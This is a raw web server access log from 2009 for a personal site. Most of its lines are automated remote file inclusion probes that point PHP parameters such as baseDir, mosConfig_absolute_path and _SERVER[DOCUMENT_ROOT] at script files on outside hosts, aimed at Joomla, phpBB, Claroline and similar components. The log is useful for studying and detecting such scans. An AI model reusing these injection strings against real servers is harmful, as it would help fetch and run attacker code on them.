63.206.47.131 - - [30/Oct/2009:09:13:06 -0700] "GET /blog/wp-content/themes/defaultwide/defaultwide/images/kubrickfooter.jpg HTTP/1.1" 200 2683 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [30/Oct/2009:09:13:06 -0700] "GET /blog/wp-includes/js/thickbox/loadingAnimation.gif HTTP/1.1" 200 5886 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)" "dmulk.com"
63.206.47.131 - - [30/Oct/2009:09:13:06 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)" "dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:13:38 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:13:38 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:13:38 -0700] "GET /logs/access_080308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:13:38 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:13:38 -0700] "GET /logs/access_080308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:13:38 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:13:38 -0700] "GET /logs/access_080308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:13:38 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:13:38 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:13:44 -0700] "GET /logs/access_080423.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:13:47 -0700] "GET /logs/access_080423.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:13:48 -0700] "GET /logs/access_080423.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:01 -0700] "GET /logs/access_080529.log///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:02 -0700] "GET //vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:02 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:11 -0700] "GET /logs/access_080529.log///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:11 -0700] "GET //vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:11 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:09:15:16 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:19 -0700] "GET /logs/access_080529.log///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:19 -0700] "GET /logs/access_080529.log///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:19 -0700] "GET //vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:19 -0700] "GET //vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:19 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:19 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:09:15:21 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:09:15:21 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:45 -0700] "GET /logs/access_080529.log///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:45 -0700] "GET //vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:46 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:52 -0700] "GET /logs/access_080529.log///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:52 -0700] "GET //vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:15:52 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:16:08 -0700] "GET /logs/access_080529.log///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:16:08 -0700] "GET //vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:16:08 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:16:12 -0700] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:16:12 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:16:12 -0700] "GET /logs/access_080226.log%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:16:12 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:16:12 -0700] "GET /logs/access_080602.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:16:12 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:16:13 -0700] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:16:13 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:16:13 -0700] "GET /logs/access_080226.log%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:16:19 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:16:19 -0700] "GET /claroline/tracking/userLog.php?rootSys=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:16:19 -0700] "GET /logs/access_080529.log%20%20//claroline/tracking/userLog.php?rootSys=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:16:21 -0700] "GET /logs/access_080528.log%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:16:21 -0700] "GET /logs/access_080528.log%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:16:23 -0700] "GET /logs/access_080422.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:16:25 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:16:25 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:16:25 -0700] "GET /logs/access_080602.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:16:38 -0700] "GET /logs/access_080226.log//skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:16:38 -0700] "GET /logs/access_080226.log//skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:16:43 -0700] "GET /logs/access_080528.log//skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:16:45 -0700] "GET /logs/access_080528.log//skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:16:51 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:16:51 -0700] "GET /logs/access_080602.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:16:51 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:16:56 -0700] "GET /claroline/tracking/userLog.php?rootSys=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:16:56 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:16:56 -0700] "GET /logs/access_080106.log%20%20//claroline/tracking/userLog.php?rootSys=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
85.94.33.242 - - [30/Oct/2009:09:17:10 -0700] "GET /logs/access_090516.log/index.php?body=http://www.lenzoo.ru/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.94.33.242 - - [30/Oct/2009:09:17:10 -0700] "GET /logs/access_090819.log/index.php?body=http://www.lenzoo.ru/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.94.33.242 - - [30/Oct/2009:09:17:10 -0700] "GET /logs/index.php?body=http://www.lenzoo.ru/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.94.33.242 - - [30/Oct/2009:09:17:12 -0700] "GET /index.php?body=http://www.lenzoo.ru/x? HTTP/1.1" 200 15894 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [30/Oct/2009:09:17:12 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:17:19 -0700] "GET /logs/access_080422.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:17:24 -0700] "GET /logs/access_080422.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:09:17:28 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 200 16060 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:09:17:28 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 200 123788 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:09:17:34 -0700] "GET /logs/access_080208.log HTTP/1.0" 200 1325284 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:09:17:55 -0700] "GET /logs/access_090731.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.94.33.242 - - [30/Oct/2009:09:18:02 -0700] "GET /logs/access_090819.log%20%20/index.php?body=http://www.lenzoo.ru/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.94.33.242 - - [30/Oct/2009:09:18:02 -0700] "GET /logs/access_090516.log%20%20/index.php?body=http://www.lenzoo.ru/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.0.87.121 - - [30/Oct/2009:09:18:16 -0700] "GET /logs/access_090801.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.0.87.121 - - [30/Oct/2009:09:18:16 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 123791 "-" "Mozilla/5.0" "www.dmulk.com"
213.0.87.121 - - [30/Oct/2009:09:18:17 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 16060 "-" "Mozilla/5.0" "www.dmulk.com"
213.0.87.121 - - [30/Oct/2009:09:18:18 -0700] "GET /logs/access_090801.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.0.87.121 - - [30/Oct/2009:09:18:18 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 123791 "-" "Mozilla/5.0" "www.dmulk.com"
213.0.87.121 - - [30/Oct/2009:09:18:21 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 16059 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:18:53 -0700] "GET /logs/access_080623.log///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:18:53 -0700] "GET /logs/access_080623.log///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:18:58 -0700] "GET /logs/access_080623.log///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:18:59 -0700] "GET /logs/access_080623.log///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:19:14 -0700] "GET /logs/access_080623.log///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:19:20 -0700] "GET /logs/access_080623.log///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.3.182.177 - - [30/Oct/2009:09:19:23 -0700] "GET /logs/access_090819.log/index.php?body=http://www.lenzoo.ru/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.3.182.177 - - [30/Oct/2009:09:19:23 -0700] "GET /index.php?body=http://www.lenzoo.ru/x? HTTP/1.0" 200 15878 "-" "Mozilla/5.0" "www.dmulk.com"
204.3.182.177 - - [30/Oct/2009:09:19:23 -0700] "GET /logs/index.php?body=http://www.lenzoo.ru/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.3.182.177 - - [30/Oct/2009:09:19:24 -0700] "GET /logs/access_090516.log/index.php?body=http://www.lenzoo.ru/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:19:29 -0700] "GET /logs/access_080623.log///vwar/backup/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.3.182.177 - - [30/Oct/2009:09:20:06 -0700] "GET /logs/access_090819.log%20%20/index.php?body=http://www.lenzoo.ru/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:09:20:07 -0700] "GET /logs///calendar/?cfg[rootPath]=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:09:20:07 -0700] "GET /logs/access_080707.log%20%20///calendar/?cfg[rootPath]=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.97.212.185 - - [30/Oct/2009:09:20:07 -0700] "GET //calendar/?cfg[rootPath]=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.3.182.177 - - [30/Oct/2009:09:20:09 -0700] "GET /logs/access_090516.log%20%20/index.php?body=http://www.lenzoo.ru/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:20:24 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:20:24 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:20:24 -0700] "GET /logs/access_080314.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:20:28 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:20:28 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:20:28 -0700] "GET /logs/access_080314.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:20:29 -0700] "GET /logs/access_090115.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.73.17.7 - - [30/Oct/2009:09:20:32 -0700] "GET /logs/access_090115.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [30/Oct/2009:09:20:36 -0700] "GET /logs/access_090528.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [30/Oct/2009:09:20:36 -0700] "GET /logs/access_080425.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:09:22:29 -0700] "GET /logs/access_080304.log%20%20//?path%5Bdocroot%5D=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.191.76 - - [30/Oct/2009:09:23:02 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://0pop.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
195.13.191.76 - - [30/Oct/2009:09:23:17 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://0pop.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:29 -0700] "GET /logs/access_080515.log//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:29 -0700] "GET /logs/access_080515.log//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
